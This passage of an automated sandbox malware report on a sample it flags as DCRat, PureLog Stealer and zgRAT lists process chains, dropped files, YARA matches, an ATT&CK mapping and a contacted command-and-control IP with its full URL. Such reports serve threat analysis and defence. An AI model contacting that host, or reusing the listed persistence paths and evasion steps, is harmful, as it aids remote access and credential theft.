                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF654 cpuid 0_2_002EF654
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_002EAF0F
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeQueries volume information: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DB146 GetVersionExW,0_2_002DB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: winIntorefruntimebroker.exe PID: 7460, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7652, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7952, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: winIntorefruntimebroker.exe PID: 7460, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7652, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7952, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts2
                                    Command and Scripting Interpreter                                    		11
                                    Scripting                                    		11
                                    Process Injection                                    		23
                                    Masquerading                                    		OS Credential Dumping1
                                    System Time Discovery                                    		Remote Services11
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		LSASS Memory121
                                    Security Software Discovery                                    		Remote Desktop ProtocolData from Removable Media2
                                    Ingress Tool Transfer                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                                    Virtualization/Sandbox Evasion                                    		Security Account Manager1
                                    Process Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive2
                                    Non-Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                    Process Injection                                    		NTDS41
                                    Virtualization/Sandbox Evasion                                    		Distributed Component Object ModelInput Capture12
                                    Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                    Deobfuscate/Decode Files or Information                                    		LSA Secrets1
                                    Remote System Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                                    Obfuscated Files or Information                                    		Cached Domain Credentials1
                                    System Network Configuration Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                                    Software Packing                                    		DCSync3
                                    File and Directory Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading                                    		Proc Filesystem36
                                    System Information Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583844 Sample: 7vP2IvNXqx.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Antivirus detection for dropped file 2->81 83 12 other signatures 2->83 14 7vP2IvNXqx.exe 3 10 2->14         started        process3 file4 69 C:\Users\user\...\winIntorefruntimebroker.exe, PE32 14->69 dropped 71 AM6p4h9HDRVrPwzz61...dr9KsZj3Jw8eGFm.vbe, data 14->71 dropped 17 wscript.exe 1 14->17         started        process5 signatures6 75 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->75 20 cmd.exe 1 17->20         started        process7 process8 22 winIntorefruntimebroker.exe 3 16 20->22         started        26 conhost.exe 20->26         started        file9 59 C:\...\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PE32 22->59 dropped 61 C:\...\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PE32 22->61 dropped 63 C:\...\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PE32 22->63 dropped 65 3 other malicious files 22->65 dropped 85 Antivirus detection for dropped file 22->85 87 Multi AV Scanner detection for dropped file 22->87 89 Machine Learning detection for dropped file 22->89 28 cmd.exe 1 22->28         started        signatures10 process11 signatures12 93 Uses ping.exe to sleep 28->93 95 Uses ping.exe to check the status of other devices and networks 28->95 31 fXvSafnhbinoSxnWSYFNsCJETLnb.exe 14 6 28->31         started        35 w32tm.exe 1 28->35         started        37 conhost.exe 28->37         started        39 chcp.com 1 28->39         started        process13 dnsIp14 73 206.188.197.24, 49730, 49737, 49738 DEFENSE-NETUS United States 31->73 57 C:\Users\user\AppData\...CvQfnJznV.bat, DOS 31->57 dropped 41 cmd.exe 1 31->41         started        file15 process16 signatures17 91 Uses ping.exe to sleep 41->91 44 fXvSafnhbinoSxnWSYFNsCJETLnb.exe 41->44         started        47 conhost.exe 41->47         started        49 chcp.com 41->49         started        51 PING.EXE 41->51         started        process18 file19 67 C:\Users\user\AppData\...\ddp3dI2Wa5.bat, DOS 44->67 dropped 53 cmd.exe 44->53         started        process20 process21 55 conhost.exe 53->55         started       

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    7vP2IvNXqx.exe66%ReversingLabsWin32.Trojan.Uztuby
                                    7vP2IvNXqx.exe100%AviraVBS/Runner.VPG
                                    7vP2IvNXqx.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://206.188.197.240%Avira URL Cloudsafe
                                    http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php0%Avira URL Cloudsafe
                                    http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.phptrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

